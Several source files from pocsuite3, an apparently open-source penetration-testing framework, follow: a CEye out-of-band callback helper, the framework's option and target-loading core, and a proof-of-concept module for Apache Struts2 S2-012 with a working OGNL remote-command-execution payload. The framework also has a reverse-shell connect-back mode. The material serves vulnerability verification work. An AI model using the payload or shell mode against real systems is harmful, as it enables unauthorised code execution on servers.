                if resp and resp.status_code == 200 and 'identify' in resp.text:
                    self.identify = resp.json()['data']['identify']
                    return True
                else:
                    logger.info(resp.text)
            except Exception as ex:
                logger.error(str(ex))
        return False

    def check_account(self):
        return self.check_token()

    def check_token(self):
        if self.token_is_available():
            return True

        while True:
            self.token = getpass.getpass('CEye API token: (input will hidden)')
            if self.token_is_available():
                self.write_conf()
                return True
            else:
                logger.error('The CEye api token is incorrect, Please enter the correct api token.')

    def write_conf(self):
        if not self.parser.has_section('CEye'):
            self.parser.add_section('CEye')
        try:
            self.parser.set('CEye', 'token', self.token)
            self.parser.write(open(self.conf_path, "w"))
        except Exception as ex:
            logger.error(str(ex))

    def verify_request(self, flag, type='request'):
        """
        Check whether the ceye interface has data

        :param flag: Input flag
        :param type: Request type (dns|request), the default is request
        :return: Boolean
        """
        ret_val = False
        counts = 3
        url = f'{self.url}/records?token={self.token}&type={type}&filter={flag}'
        while counts:
            try:
                time.sleep(1)
                resp = requests.get(url)
                if resp and resp.status_code == 200 and flag in resp.text:
                    ret_val = True
                    break
            except Exception as ex:
                logger.warn(ex)
                time.sleep(1)
            counts -= 1
        return ret_val

    def exact_request(self, flag, type="request"):
        """
        Obtain relevant data by accessing the ceye interface

        :param flag: Input flag
        :param type: Request type (dns|request), the default is request
        :return: Return the acquired data
        """
        counts = 3
        url = f'{self.url}/records?token={self.token}&type={type}&filter={flag}'
        while counts:
            try:
                time.sleep(1)
                resp = requests.get(url)
                if resp and resp.status_code == 200 and flag in resp.text:
                    data = json.loads(resp.text)
                    for item in data["data"]:
                        name = item.get("name", '')
                        pro = flag
                        suffix = flag
                        t = get_middle_text(name, pro, suffix, 0)
                        if t:
                            return t
                    break
            except Exception as ex:
                logger.warn(ex)
                time.sleep(1)
            counts -= 1
        return False

    def build_request(self, value, type="request"):
        """
        Generate the sent string

        :param value: Enter the message to be sent
        :param type: Request type (dns|request), the default is request
        :return: dict { url: Return the received domain name,flag: Return a random flag }
        Example:
          {
            'url': 'http://htCb.jwm77k.ceye.io/htCbpingaaahtCb',
            'flag': 'htCb'
          }

        """
        ranstr = random_str(4)
        domain = self.getsubdomain()
        url = ""
        if type in ["request", 'http']:
            url = "http://{}.{}/{}{}{}".format(ranstr, domain, ranstr, value, ranstr)
        elif type == "dns":
            url = "{}{}{}.{}".format(ranstr, re.sub(r"\W", "", value), ranstr, domain)
        return {"url": url, "flag": ranstr}

    def getsubdomain(self):
        """
        :return: Return the obtained domain name
        """
        return f'{self.identify}.ceye.io'


if __name__ == "__main__":
    ce = CEye()
    # http record
    # Auxiliary generation of flag string
    flag = ce.build_request("HelloWorld3")
    print(flag)
    # Simulate requests with requests
    try:
        r = requests.get(flag["url"])
    except Exception:
        pass
    time.sleep(1)
    print("request over")
    # Get the requested data
    info = ce.exact_request(flag["flag"], )
    print(info)

    # dns record
    # Auxiliary generation of flag string
    flag = ce.build_request("HelloWor1d", type='dns')
    print(flag)
    # Simulate request with requests
    # r = requests.get(flag["url"])
    os.system("ping -nc 2 " + flag["url"])
    time.sleep(1)
    print("ping over")
    # Get the requested data
    info = ce.exact_request(flag["flag"], type="dns")
    print(info)



from collections import OrderedDict
from urllib.parse import quote

from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests
from pocsuite3.lib.core.enums import VUL_TYPE
from pocsuite3.lib.core.interpreter_option import OptString
from pocsuite3.lib.utils import random_str


class DemoPOC(POCBase):
    vulID = ''  # ssvid
    version = '1.0'
    author = ['knownsec.com']
    vulDate = '2033-11-15'
    createDate = '2023-11-15'
    updateDate = '2023-11-15'
    references = ['https://cwiki.apache.org/confluence/display/WW/S2-012']
    name = 'Apache Struts2 s2-012'
    appPowerLink = ''
    appName = 'Apache Struts2'
    appVersion = 'Struts Showcase App 2.0.0 - Struts Showcase App 2.3.14.2 '
    vulType = VUL_TYPE.CODE_EXECUTION
    desc = '''S2-012:影响版本Struts Showcase App 2.0.0 - Struts Showcase App 2.3.14.2'''
    samples = []
    category = POC_CATEGORY.EXPLOITS.WEBAPP
    dockerfile = '''FROM isxiangyang/struts2-all-vul-pocsuite:latest'''

    def _options(self):
        o = OrderedDict()
        o["command"] = OptString('ls', description="可执行的shell命令")
        return o

    def _verify(self):
        p = self._check()
        if p:
            return self.parse_output(p)

    def _check(self):
        result = {}
        command = "id"
        html = self.exp(command)

        if "groups=" in html:
            result["VerifyInfo"] = {
                "URL": self.url,
            }
            return result

        return False

    def exp(self, command):
        exec_payload = "%25%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B'{cmd}'%7D)).redirectErrorStream(true).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read(%23e)%2C%23f%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22)%2C%23f.getWriter().println(new%20java.lang.String(%23e))%2C%23f.getWriter().flush()%2C%23f.getWriter().close()%7D"
        payload = exec_payload.format(cmd=quote(command))
        headers = {}
        headers['Content-Type'] = "application/x-www-form-urlencoded"
        data = f"name={payload}"
        html = requests.post(self.url, data=data, headers=headers).text
        return html

    def _attack(self):
        result = {}
        p = self._check()
        if p:
            command = self.get_option("command")
            html = self.exp(command)

            result["VerifyInfo"] = {
                "URL": self.url,
                "HTML": html.replace("\x00", "").encode()
            }

        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output


register_poc(DemoPOC)



__title__ = 'pocsuite3'
__version__ = '2.1.0'
__author__ = 'Knownsec 404 Team'
__author_email__ = '404-team@knownsec.com'
__license__ = 'GPLv2'
__copyright__ = 'Copyright 2014-present Knownsec 404 Team'
__name__ = 'pocsuite3'
__package__ = 'pocsuite3'

from .lib.core.common import set_paths
from .cli import module_path


set_paths(module_path())



import copy
import glob
import logging
import os
import re
import socket
import importlib
from queue import Queue
from urllib.parse import urlsplit
from http.client import HTTPConnection

import docker.errors
import requests
from requests_toolbelt.adapters.socket_options import TCPKeepAliveAdapter
import socks
import prettytable
from termcolor import colored
from pocsuite3.lib.core.clear import remove_extra_log_message
from pocsuite3.lib.core.common import boldify_message, check_file, get_file_items, parse_target, \
    get_public_type_members, data_to_stdout
from pocsuite3.lib.core.common import check_path, extract_cookies
from pocsuite3.lib.core.common import get_local_ip, mosaic, get_host_ip
from pocsuite3.lib.core.common import single_time_warn_message
from pocsuite3.lib.core.common import OrderedSet, get_file_text, get_poc_name
from pocsuite3.lib.core.common import index_modules, ltrim
from pocsuite3.lib.core.common import parse_poc_docker_name
from pocsuite3.lib.core.convert import stdout_encode
from pocsuite3.lib.core.data import conf, cmd_line_options
from pocsuite3.lib.core.data import kb
from pocsuite3.lib.core.data import logger
from pocsuite3.lib.core.data import merged_options
from pocsuite3.lib.core.data import paths
from pocsuite3.lib.core.datatype import AttribDict
from pocsuite3.lib.core.enums import HTTP_HEADER, CUSTOM_LOGGING, PROXY_TYPE
from pocsuite3.lib.core.exception import PocsuiteSyntaxException, PocsuiteSystemException, PocsuiteHeaderTypeException
from pocsuite3.lib.core.log import FORMATTER
from pocsuite3.lib.core.register import load_file_to_module
from pocsuite3.lib.core.settings import DEFAULT_LISTENER_PORT, CMD_PARSE_WHITELIST
from pocsuite3.lib.core.docker_env import DockerEnv
from pocsuite3.lib.core.statistics_comparison import StatisticsComparison
from pocsuite3.lib.core.update import update
from pocsuite3.lib.core.template import create_poc_plugin_template
from pocsuite3.lib.parse.cmd import DIY_OPTIONS
from pocsuite3.lib.parse.configfile import config_file_parser
from pocsuite3.lib.parse.rules import regex_rule
from pocsuite3.lib.parse.dockerfile import parse_dockerfile
from pocsuite3.lib.request.patch import patch_all
from pocsuite3.lib.request.patch.session_reuse import api_request
from pocsuite3.modules.listener import start_listener


def _resolve_cross_references():
    import pocsuite3
    pocsuite3.lib.core.revision.stdout_encode = stdout_encode
    pocsuite3.lib.core.convert.single_time_warn_message = single_time_warn_message


def set_verbosity():
    """
    This function set the verbosity of pocsuite output messages.
    """

    HTTPConnection.debuglevel = int(conf.http_debug)

    if conf.verbose is None:
        conf.verbose = 1

    conf.verbose = int(conf.verbose)

    if conf.verbose == 0:
        logger.setLevel(logging.ERROR)
    elif conf.verbose == 1:
        logger.setLevel(logging.INFO)
    elif conf.verbose == 2:
        logger.setLevel(logging.DEBUG)
    elif conf.verbose == 3:
        logger.setLevel(logging.DEBUG)
        logger.setLevel(CUSTOM_LOGGING.SYSINFO)
    elif conf.verbose == 4:
        logger.setLevel(logging.DEBUG)
        logger.setLevel(CUSTOM_LOGGING.WARNING)
    elif conf.verbose >= 5:
        logger.setLevel(logging.DEBUG)
        logger.setLevel(CUSTOM_LOGGING.ERROR)


def _set_http_user_agent():
    '''
    set user-agent
    :return:
    '''
    if conf.agent:
        conf.http_headers[HTTP_HEADER.USER_AGENT] = conf.agent


def _set_http_referer():
    if conf.referer:
        conf.http_headers[HTTP_HEADER.REFERER] = conf.referer


def _set_http_cookie():
    if conf.cookie:
        if isinstance(conf.cookie, dict):
            conf.http_headers[HTTP_HEADER.COOKIE] = '; '.join(map(lambda x: '='.join(x), conf.cookie.items()))
        else:
            conf.http_headers[HTTP_HEADER.COOKIE] = conf.cookie


def _set_http_host():
    if conf.host:
        conf.http_headers[HTTP_HEADER.HOST] = conf.host


def _set_http_extra_headers():
    if conf.headers:
        conf.headers = conf.headers.split("\n") if "\n" in conf.headers else conf.headers.split("\\n")
        for header_value in conf.headers:
            if not header_value.strip():
                continue

            if header_value.count(':') >= 1:
                header, value = (_.lstrip() for _ in header_value.split(":", 1))
                if header and value:
                    if header not in conf.http_headers:
                        conf.http_headers[header] = value


def _set_network_timeout():
    if conf.timeout:
        conf.timeout = float(conf.timeout)
        if conf.timeout < 3.0:
            warn_msg = "the minimum HTTP timeout is 3 seconds, pocsuite "
            warn_msg += "will going to reset it"
            logger.warn(warn_msg)

            conf.timeout = 3.0
    else:
        conf.timeout = 10

    socket.setdefaulttimeout(conf.timeout)


def _set_network_proxy():
    if conf.proxy:
        debug_msg = "setting the HTTP/SOCKS proxy for all network requests"
        logger.debug(debug_msg)

        try:
            _ = urlsplit(conf.proxy)
        except Exception as ex:
            err_msg = "invalid proxy address '{0}' ('{1}')".format(conf.proxy, str(ex))
            raise PocsuiteSyntaxException(err_msg)

        hostname_port = _.netloc.split(":")
        scheme = _.scheme.upper()
        hostname = hostname_port[0]
        port = None
        username = None
        password = None

        if len(hostname_port) == 2:
            try:
                port = int(hostname_port[1])
            except Exception:
                pass

        if not all((scheme, hasattr(PROXY_TYPE, scheme), hostname, port)):
            err_msg = "proxy value must be in format '({0})://address:port'".format("|".join(
                _[0].lower() for _ in get_public_type_members(PROXY_TYPE)))
            raise PocsuiteSyntaxException(err_msg)

        if conf.proxy_cred:
            _ = re.search(r"\A(.*?):(.*?)\Z", conf.proxy_cred)
            if not _:
                err_msg = "proxy authentication credentials "
                err_msg += "value must be in format username:password"
                raise PocsuiteSyntaxException(err_msg)
            else:
                username = _.group(1)
                password = _.group(2)

        if scheme in (PROXY_TYPE.SOCKS4, PROXY_TYPE.SOCKS5, PROXY_TYPE.SOCKS5H):
            socks.set_default_proxy(
                socks.PROXY_TYPE_SOCKS4 if scheme == PROXY_TYPE.SOCKS4 else socks.PROXY_TYPE_SOCKS5,
                hostname,
                port,
                username=username,
                password=password,
                rdns=True if scheme == PROXY_TYPE.SOCKS5H else False,
            )
            conf.origin_socks = copy.deepcopy(socket.socket)  # Convenient behind recovery
            socket.socket = socks.socksocket

        if conf.proxy_cred:
            proxy_string = "{0}@".format(conf.proxy_cred)
        else:
            proxy_string = ""

        proxy_string = "{scheme}://{proxy_string}{hostname}:{port}".format(scheme=scheme.lower(),
                                                                           proxy_string=proxy_string,
                                                                           hostname=hostname, port=port)
        conf.proxies = {
            "http": proxy_string,
            "https": proxy_string
        }


def _set_session_queue():
    requests.api.request = api_request
    for _ in range(0, conf.requests_session_reuse_num):
        session = requests.Session()
        session.headers.update({'Connection': 'keep-alive'})
        # https://github.com/psf/requests/issues/6354
        keep_alive = TCPKeepAliveAdapter()
        session.mount("http://", keep_alive)
        session.mount("https://", keep_alive)
        kb.session_queue.put(session)


def _set_multiple_targets():
    # set multi targets to kb
    if conf.url:
        for url in conf.url:
            for target in parse_target(url, conf.ports, conf.skip_target_port):
                kb.targets.add(target)

    if conf.url_file:
        for line in get_file_items(conf.url_file, lowercase=False, unique=True):
            for target in parse_target(line, conf.ports, conf.skip_target_port):
                kb.targets.add(target)

    if conf.dork:
        # enable plugin 'target_from_zoomeye' by default
        if ('target_from_shodan' not in conf.plugins and
                'target_from_censys' not in conf.plugins and
                'target_from_fofa' not in conf.plugins and
                'target_from_quake' not in conf.plugins and
                'target_from_hunter' not in conf.plugins):
            conf.plugins.append('target_from_zoomeye')

    if conf.dork_zoomeye:
        conf.plugins.append('target_from_zoomeye')

    if conf.dork_shodan:
        conf.plugins.append('target_from_shodan')

    if conf.dork_censys:
        conf.plugins.append('target_from_censys')

    if conf.dork_fofa:
        conf.plugins.append('target_from_fofa')

    if conf.dork_quake:
        conf.plugins.append('target_from_quake')

    if conf.dork_hunter:
        conf.plugins.append('target_from_hunter')


def _set_task_queue():
    if kb.registered_pocs and kb.targets:
        for poc_module in kb.registered_pocs:
            for target in kb.targets:
                kb.task_queue.put((target, poc_module))


def _check_account_login():
    # TODO
    # check telnet404 account login
    pass


def _check_ceye():
    # TODO
    # check ceye and ceye api token is available
    pass


def _check_seebug():
    # TODO
    # check seebug and seebug api token is available
    pass


def _check_zoomeye():
    # TODO
    # check zoomeye and zoomeye api token is available
    pass


def _set_threads():
    if not isinstance(conf.threads, int) or conf.threads <= 0:
        conf.threads = 150


def _set_connect_back():
    if conf.mode == "shell" and conf.connect_back_host is None:
        wan_ipv4 = get_host_ip()
        kb.data.local_ips = get_local_ip(all=True)
        data_to_stdout("[i] pocsusite is running in shell mode, you need to set connect back host:\n")
        message = '----- Local IP Address -----\n'
        for i, ip in enumerate(kb.data.local_ips):
            v = mosaic(ip)
            if ip == wan_ipv4:
                v = colored(f'{v}    *wan*', 'green')
            message += "{0}    {1}\n".format(i, v)
        data_to_stdout(message)
        while True:
            choose = None
            choose = input('Choose>: ').strip()
            if not choose:
                continue
            try:
                if choose.isdigit():
                    choose = int(choose)
                    conf.connect_back_host = kb.data.local_ips[choose]
                    data_to_stdout("you choose {0}\n".format(mosaic(conf.connect_back_host)))
                    break
            except Exception:
                data_to_stdout("wrong number, choose again\n")


def _set_listener():
    if conf.mode == "shell" and not conf.api:
        start_listener()


def _set_user_pocs_path():
    if conf.pocs_path:
        if check_path(conf.pocs_path):
            paths.USER_POCS_PATH = conf.pocs_path
            for root, dirs, files in os.walk(paths.USER_POCS_PATH):
                files = list(filter(lambda x: not x.startswith("__") and x.endswith(".py"), files))
                conf.poc = [os.path.join(paths.USER_POCS_PATH, f) for f in files]
        else:
            warm_msg = "User defined pocs path {0} is invalid".format(conf.pocs_path)
            logger.warn(warm_msg)


def _set_pocs_modules():
    # TODO
    # load poc scripts .pyc file support
    if conf.ssvid:
        conf.plugins.append('poc_from_seebug')

    if not (conf.poc or conf.vul_keyword) and conf.poc_keyword:
        conf.poc = [paths.POCSUITE_POCS_PATH]

    if conf.poc:
        exists_poc_with_ext = list(
            filter(lambda x: x not in ['__init__.py', '__init__.pyc'], os.listdir(paths.POCSUITE_POCS_PATH)))
        exists_pocs = dict([os.path.splitext(x) for x in exists_poc_with_ext])
        for poc in conf.poc:
            # load poc from pocsuite3/pocs folder or other local path
            try:
                _pocs = []
                load_poc_sucess = False

                if os.path.isfile(poc):
                    _pocs.append(poc)

                elif any([poc in exists_poc_with_ext, poc in exists_pocs]):
                    poc_name, poc_ext = os.path.splitext(poc)
                    if poc_ext in ['.py', '.pyc', '.yaml']:
                        file_path = os.path.join(paths.POCSUITE_POCS_PATH, poc)
                    else:
                        file_path = os.path.join(paths.POCSUITE_POCS_PATH, poc + exists_pocs.get(poc))
                    _pocs.append(file_path)

                elif check_path(poc):
                    for root, _, files in os.walk(poc):
                        files = filter(lambda x: not x.startswith("__") and x.endswith(".py") or
                                       x.endswith('.yaml'), files)
                        _pocs.extend(map(lambda x: os.path.join(root, x), files))

                for p in _pocs:
                    file_content = get_file_text(p)
                    if not re.search(r'register_poc|matchers:\s+-', file_content):
                        continue
                    if conf.poc_keyword:
                        if not re.search(conf.poc_keyword, file_content, re.I | re.M):
                            continue
                    info_msg = "loading PoC script '{0}'".format(p)
                    logger.info(info_msg)
                    load_poc_sucess = load_file_to_module(p) or load_poc_sucess
            except PocsuiteSystemException:
                logger.error('PoC file "{0}" not found'.format(repr(poc)))
                continue

            # load poc from seebug website using plugin 'poc_from_seebug'
            if not load_poc_sucess and poc.startswith('ssvid-'):
                info_msg = "loading Poc script 'https://www.seebug.org/vuldb/{0}'".format(poc)
                logger.info(info_msg)
                if "poc_from_seebug" not in conf.plugins:
                    conf.plugins.append('poc_from_seebug')

    if conf.vul_keyword:
        # step4. load poc with vul_keyword search seebug website
        info_msg = "loading PoC script from seebug website using search keyword '{0}' ".format(conf.vul_keyword)
        logger.info(info_msg)

        conf.plugins.append('poc_from_seebug')


def _set_plugins():
    # TODO
    # load plugin scripts .pyc file support
    if conf.plugins:
        founds = []
        cache_plugins = copy.deepcopy(conf.plugins)

        for found in glob.glob(os.path.join(paths.POCSUITE_PLUGINS_PATH, "*.py*")):
            dirname, filename = os.path.split(found)
            plugin_name = os.path.splitext(filename)[0]
            if found.endswith(('__init__.py', '__init__.pyc')):
                continue
            if plugin_name not in conf.plugins:
                continue
            cache_plugins.remove(plugin_name)
            founds.append(found)
        if len(cache_plugins) > 0:
            for file in cache_plugins:
                if os.path.exists(file):
                    founds.append(file)

        for file in founds:
            debug_msg = "loading plugin script '{0}'".format(file)
            logger.debug(debug_msg)
            load_file_to_module(file)


def _cleanup_options():
    """
    Cleanup configuration attributes.
    """
    if conf.agent:
        conf.agent = re.sub(r"[\r\n]", "", conf.agent)

    if conf.cookie:
        if isinstance(conf.cookie, str):
            conf.cookie = re.sub(r"[\r\n]", "", conf.cookie)
            conf.cookie = extract_cookies(conf.cookie)
        elif not isinstance(conf.cookie, dict):
            raise PocsuiteHeaderTypeException('Does not support type for cookie')
    if conf.delay:
        conf.delay = float(conf.delay)

    if conf.retry:
        conf.retry = min(conf.retry, 10)

    if conf.url:
        if isinstance(conf.url, str):
            conf.url = [conf.url]
        conf.url = [x.strip() for x in conf.url]

    if conf.ports:
        if isinstance(conf.ports, str):
            ports = OrderedSet()
            for probe in conf.ports.split(','):
                # [proto:]port
                probe = probe.replace(' ', '')
                if len(probe.split(':')) > 2:
                    continue
                port = probe.split(':')[-1]
                if port.isdigit() and int(port) >= 0 and int(port) <= 65535:
                    ports.add(probe)
            conf.ports = list(ports)

    if conf.poc:
        if isinstance(conf.poc, str):
            conf.poc = [conf.poc]
        conf.poc = [poc.lower() if poc.lower().startswith('ssvid-') else poc for poc in conf.poc]

    if conf.url_file:
        conf.url_file = os.path.expanduser(conf.url_file)
        check_file(conf.url_file)

    if conf.plugins:
        conf.plugins = conf.plugins.split(',')
        conf.plugins = [i.strip() for i in conf.plugins]
        conf.plugins = list(set(conf.plugins))

    if conf.output_path and 'file_record' not in conf.plugins:
        conf.plugins.append('file_record')
    if 'web_hook' not in conf.plugins:
        conf.plugins.append('web_hook')

    if conf.connect_back_port:
        conf.connect_back_port = int(conf.connect_back_port)

    conf.origin_socks = None


def _basic_option_validation():
    _check_account_login()
    _check_seebug()
    _check_zoomeye()
    _check_ceye()


def _adjust_logging_formatter():
    """
    Solves problem of line deletition caused by overlapping logging messages
    and retrieved data info in inference mode
    """
    if hasattr(FORMATTER, '_format'):
        return

    def new_format(record):
        message = FORMATTER._format(record)
        message = boldify_message(message)
        return message

    FORMATTER._format = FORMATTER.format
    FORMATTER.format = new_format


def _create_directory():
    if not os.path.isdir(paths.POCSUITE_OUTPUT_PATH):
        try:
            os.makedirs(paths.POCSUITE_OUTPUT_PATH)
        except FileExistsError:
            pass

    if not os.path.isdir(paths.POCSUITE_TMP_PATH):
        try:
            os.makedirs(paths.POCSUITE_TMP_PATH)
        except FileExistsError:
            pass

    if not os.path.isfile(paths.POCSUITE_RC_PATH):
        open(paths.POCSUITE_RC_PATH, 'a').close()


def _set_conf_attributes():
    """
    This function set some needed attributes into the configuration
    singleton.
    """

    debug_msg = "initializing the configuration"
    logger.debug(debug_msg)

    conf.url = None
    conf.url_file = None
    conf.ports = []
    conf.skip_target_port = False
    conf.mode = 'verify'
    conf.poc = None
    conf.poc_keyword = None
    conf.poc_list = None
    conf.cookie = None
    conf.host = None
    conf.referer = None
    conf.agent = None
    conf.headers = None
    conf.proxy = None
    conf.proxy_cred = None
    conf.proxies = {}
    conf.timeout = 10
    conf.retry = 0
    conf.delay = 0
    conf.http_headers = {}
    conf.http_debug = 0
    conf.ceye_token = None
    conf.oob_server = None
    conf.oob_token = None
    conf.seebug_token = None
    conf.zoomeye_token = None
    conf.shodan_token = None
    conf.fofa_user = None
    conf.fofa_token = None
    conf.quake_token = None
    conf.hunter_token = None
    conf.censys_uid = None
    conf.censys_secret = None
    conf.dork = None
    conf.dork_zoomeye = None
    conf.dork_shodan = None
    conf.dork_fofa = None
    conf.dork_quake = None
    conf.dork_hunter = None
    conf.dork_censys = None
    conf.dork_b64 = False
    conf.max_page = 1
    conf.page_size = 20
    conf.search_type = 'v4'
    conf.comparison = False
    conf.vul_keyword = None
    conf.ssvid = None
    conf.plugins = []
    conf.threads = 150
    conf.batch = False
    conf.check_requires = False
    conf.quiet = False
    conf.update_all = False
    conf.new = False
    conf.verbose = 1

    conf.ipv6 = False
    conf.multiple_targets = False
    conf.pocs_path = None
    conf.output_path = None
    conf.plugin_name = None
    conf.plugin_code = None
    conf.connect_back_host = None
    conf.connect_back_port = DEFAULT_LISTENER_PORT
    conf.console_mode = False
    conf.show_version = False
    conf.api = False  # api for zipoc
    conf.ppt = False
    conf.pcap = False
    conf.rule = False
    conf.rule_req = False
    conf.rule_filename = None
    conf.no_check = False
    conf.show_options = False
    conf.enable_tls_listener = False

    # docker args
    conf.docker_start = False
    conf.docker_port = list()
    conf.docker_env = list()
    conf.docker_volume = list()
    conf.docker_only = False
    conf.requests_session_reuse = False

    # web hook
    conf.dingtalk_token = ""
    conf.dingtalk_secret = ""
    conf.wx_work_key = ""


def _set_kb_attributes(flush_all=True):
    """
    This function set some needed attributes into the knowledge base
    singleton.
    """

    debug_msg = "initializing the knowledge base"
    logger.debug(debug_msg)

    kb.abs_file_paths = set()
    kb.os = None
    kb.os_version = None
    kb.arch = None
    kb.dbms = None
    kb.auth_header = None
    kb.counters = {}
    kb.multi_thread_mode = False
    kb.thread_continue = True
    kb.thread_exception = False
    kb.word_lists = None
    kb.single_log_flags = set()

    kb.cache = AttribDict()
    kb.cache.addrinfo = {}
    kb.cache.content = {}
    kb.cache.regex = {}

    kb.data = AttribDict()
    kb.data.local_ips = []
    kb.data.connect_back_ip = None
    kb.data.connect_back_port = DEFAULT_LISTENER_PORT
    kb.data.clients = []
    kb.targets = OrderedSet()
    kb.plugins = AttribDict()
    kb.plugins.targets = AttribDict()
    kb.plugins.pocs = AttribDict()
    kb.plugins.results = AttribDict()
    kb.results = []
    kb.current_poc = None
    kb.registered_pocs = AttribDict()
    kb.task_queue = Queue()
    kb.session_queue = Queue()
    kb.cmd_line = DIY_OPTIONS or []

    kb.comparison = None


def _merge_options(input_options, override_options):
    """
    Merge command line options with configuration file and default options.
    """
    if hasattr(input_options, "items"):
        input_options_items = input_options.items()
    else:
        input_options_items = input_options.__dict__.items()

    for key, value in input_options_items:
        if key not in conf or value not in (None, False) or override_options:
            conf[key] = value

    if input_options.get("configFile"):
        config_file_parser(input_options["configFile"])

    merged_options.update(conf)


def _set_poc_options(input_options):
    for line in input_options.keys():
        if line not in CMD_PARSE_WHITELIST:
            DIY_OPTIONS.append(line)


def _set_docker_options():
    port_dict = {}
    if conf.poc and conf.docker_start:
        # parse port string
        # in docker package ports need {"2222/tcp": 3333}
        # will expose port 2222 inside the container as port 3333 on the host.
        if len(conf.docker_port) > 0:
            for item in conf.docker_port:
                item_split = item.rsplit(':', 1)
                key = '{}/tcp'.format(item_split[1])
                # if user input 127.0.0.1:8080:8080
                # need change to {'8080/tcp': ('127.0.0.1', 8080)}
                if item_split[0].find(":") > 0:
                    temp_port = item_split[0].split(':')
                    host_port = (temp_port[0], int(temp_port[1]))
                else:
                    host_port = int(item_split[0])
                port_dict[key] = host_port

        for poc in conf.poc:
            res = parse_dockerfile(poc)
            poc_name = parse_poc_docker_name(res.get('name'))
            tag_name = "{}:{}".format(poc_name, "pocsuite")
            docker_file = res.get("dockerfile")
            try:
                dk = DockerEnv()
                dk_info = dk.run(
                    tag_name,
                    docker_file,
                    ports=port_dict,
                    envs=conf.docker_env,
                    volumes=conf.docker_volume,
                )
                logger.info("Run container {} successful!".format(dk_info.short_id))
            except docker.errors.APIError as e:
                logger.error(e)
        if conf.docker_only:
            exit(0)


def init_options(input_options=AttribDict(), override_options=False):
    cmd_line_options.update(input_options)
    _set_conf_attributes()
    _set_poc_options(input_options)
    _set_kb_attributes()
    _merge_options(input_options, override_options)
    # export rules, dont run the poc in the default status
    if conf.rule or conf.rule_req:
        logger.info("The rule export function is in use. The POC is not executed at this point")
        if conf.pocs_path:
            if check_path(conf.pocs_path):
                paths.USER_POCS_PATH = conf.pocs_path
                for root, dirs, files in os.walk(paths.USER_POCS_PATH):
                    files = list(filter(lambda x: not x.startswith("__") and x.endswith(".py"), files))
                regex_rule(list(paths.USER_POCS_PATH + i for i in files))

        if conf.poc:
            regex_rule(conf.poc)
        exit()
    # if check version
    if conf.show_version:
        exit()


def _init_targets_plugins():
    for _, plugin in kb.plugins.targets.items():
        plugin.init()


def _init_pocs_plugins():
    for _, plugin in kb.plugins.pocs.items():
        plugin.init()


def _init_results_plugins():
    for _, plugin in kb.plugins.results.items():
        plugin.init()


def _init_kb_comparison():
    if conf.comparison:
        kb.comparison = StatisticsComparison()


def _init_target_from_poc_dork():
    if len(kb.targets) > 0:
        return

    for poc_module, poc_class in kb.registered_pocs.items():
        if not hasattr(poc_class, 'dork'):
            continue

        # local mode, do not need any targets. e.g. LPE
        if 'local' in poc_class.dork.keys():
            kb.targets.add('localhost')
            return

        # find a available target source
        target_source = ''
        for i in ["zoomeye", "fofa", "shodan", "quake", "hunter", "censys"]:
            if i in poc_class.dork.keys() and poc_class.dork[i].strip() != '':
                target_source = i
                break
        # fetch target from target source, add it to kb.targets
        if not target_source:
            continue
        conf.dork = poc_class.dork[target_source]
        plugin_name = f'target_from_{target_source}'
        importlib.import_module(f'pocsuite3.plugins.{plugin_name}')
        for _, plugin in kb.plugins.targets.items():
            if target_source in plugin.__class__.__name__.lower():
                plugin.init()


def _show_pocs_modules_options():
    if not conf.show_options:
        return
    for module_name, poc_class in kb.registered_pocs.items():
        module_options = poc_class.options
        tb = prettytable.PrettyTable(
            ['Name', 'Current settings', 'Type', 'Description'])
        # add target option
        for name, opt in module_options.items():
            value = opt.value
            if opt.require and value == '':
                value = colored('*require*', 'red')
            tb.add_row([name, value, opt.type, opt.description])
        data_to_stdout(f'\nModule ({module_name}) options:\n')
        data_to_stdout(tb.get_string())
        data_to_stdout('\n')
    exit()


def _show_pocs_form_local():
    if not conf.poc_list:
        return
    _pocs = []
    tb = prettytable.PrettyTable(["Index", "Path", "Name"])
    if conf.pocs_path:
        # parse user defined poc scripts path
        if check_path(conf.pocs_path):
            for root, dirs, files in os.walk(conf.pocs_path):
                files = list(filter(lambda x: not x.startswith("__") and x.endswith(".py") or x.endswith(".yaml"), files))
                conf.poc = [os.path.join(conf.pocs_path, f) for f in files]
        moduels = index_modules(conf.pocs_path)
        poc_parent_directory = os.sep.join(
            conf.pocs_path.rstrip(os.sep).split(os.sep)) + os.sep
        for poc in moduels:
            _pocs.append(ltrim(poc, conf.pocs_path).lstrip(os.sep))

    else:
        # default poc path
        conf.poc = [paths.POCSUITE_POCS_PATH]
        moduels = index_modules(paths.POCSUITE_POCS_PATH)
        poc_parent_directory = os.sep.join(
            paths.POCSUITE_POCS_PATH.rstrip(os.sep).split(os.sep)[0:-1]) + os.sep
        for poc in moduels:
            _pocs.append(ltrim(poc, poc_parent_directory).lstrip(os.sep))
    # show result table
    try:
        index = 0
        for poc in _pocs:
            file = os.path.join(poc_parent_directory, poc + ".py")
            if not os.path.exists(file):
                file = os.path.join(poc_parent_directory, poc + ".yaml")
            code = get_file_text(file)
            name = get_poc_name(code)
            tb.add_row([str(index), poc, name])
            index += 1
        data_to_stdout("\n" + tb.get_string() + "\n")
    except PocsuiteSystemException as ex:
        logger.error(str(ex))
    finally:
        exit(0)


def init():
    """
    Set attributes into both configuration and knowledge base singletons
    based upon command line and configuration file options.
    """
    set_verbosity()
    patch_all()
    _adjust_logging_formatter()
    _cleanup_options()
    _basic_option_validation()
    _create_directory()
    _init_kb_comparison()
    create_poc_plugin_template()
    update()
    _set_multiple_targets()
    _set_user_pocs_path()
    # show poc form pac path
    _show_pocs_form_local()
    # The poc module module must be in front of the plug-in module,
    # and some parameters in the poc option call the plug-in
    _set_pocs_modules()
    # run docker from poc
    _set_docker_options()
    _set_plugins()
    _init_targets_plugins()
    _init_pocs_plugins()
    _show_pocs_modules_options()
    _init_target_from_poc_dork()
    _set_task_queue()
    _init_results_plugins()

    if any((conf.url, conf.url_file, conf.plugins)):
        _set_http_cookie()
        _set_http_host()
        _set_http_referer()
        _set_http_user_agent()
        _set_http_extra_headers()

